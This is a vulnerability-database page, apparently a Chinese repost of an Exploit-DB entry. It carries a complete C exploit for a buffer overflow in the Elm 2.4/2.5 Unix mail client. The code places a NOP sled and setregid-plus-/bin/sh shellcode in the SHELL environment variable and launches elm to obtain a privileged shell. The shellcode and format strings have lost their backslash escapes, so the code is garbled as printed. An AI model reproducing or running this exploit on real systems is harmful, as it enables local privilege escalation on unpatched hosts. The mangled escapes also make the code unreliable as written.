Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (2)

Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (2)

漏洞ID 1053446 漏洞类型
发布时间 2000-05-27 更新时间 2000-05-27
图片[1]-Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (2)-安全小百科CVE编号 N/A
图片[2]-Elm Development Group ELM 2.4/2.5.1 Mail for UNIX – ELM Buffer Overflow (2)-安全小百科CNNVD-ID N/A
漏洞平台 Unix CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19972
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/1276/info
 
Buffer overflow vulnerabilities exist in elm (Electronic Mail for Unix). 

/* 
  Elm 2.5 PL3 exploit 
  Tested Under Linux Slackware 3.6, 4.0, 7.0
  By xfer ([email protected])
  Of Buffer0verfl0w Security
  At Sat May 27 18:52:14 CEST 2000
  HowTo: Hmmm.. Ya have to play with offset.
  MoreInfo: Elm is shit, it has bug in each option or function ;>.
*/ 
#include <stdio.h>
#include <unistd.h>
#define PATH "/usr/local/bin/elm"
#define BUFFER 256
#define NOP 0x90
                   /* setregid + generic shell code */
char shellcode[] = "x31xdbx31xc9xbbxffxffxffxffxb1x0cx31xc0xb0"
                   "x47xcdx80x31xdbx31xc9xb3x0cxb1x0cx31xc0xb0"
		   "x47xcdx80xebx1fx5ex89x76x08x31xc0x88x46x07"
		   "x89x46x0cxb0x0bx89xf3x8dx4ex08x8dx56x0cxcd"
		   "x80x31xdbx89xd8x40xcdx80xe8xdcxffxffxffx2f"
		   "x62x69x6ex2fx73x68";
unsigned long get_esp(void) {
  __asm__("movl %esp, %eax"); 
}
int main(int argc,char *argv[]){
 char buff[BUFFER];
 int x,offset=0;
 long address;
 if(argc>1) offset=atoi(argv[1]);
 address = get_esp() + offset;
 fprintf(stderr,"Address: 0x%lxnOffset: %dnShellSize: %dn",address,offset,strlen(shellcode));
 for(x=3;x<BUFFER;x+=4) *(int *)&buff[x]=address;
 for(x=0;x<(BUFFER-strlen(shellcode));x++) buff[x]=NOP;
 memcpy(buff+(BUFFER-strlen(shellcode)),shellcode,strlen(shellcode));
 setenv("SHELL",buff,1);
 if((execl(PATH,"elm",0)) < 0) fprintf(stderr,"Kurwa Mac! No %s file ?n",PATH);
 return 0;
}

相关推荐: Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation

Check Point Software Firewall-1 3.0/1 4.0 – Session Agent Impersonation 漏洞ID 1053375 漏洞类型 发布时间 1998-09-24 更新时间 1998-09-24 CVE编号 N/…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享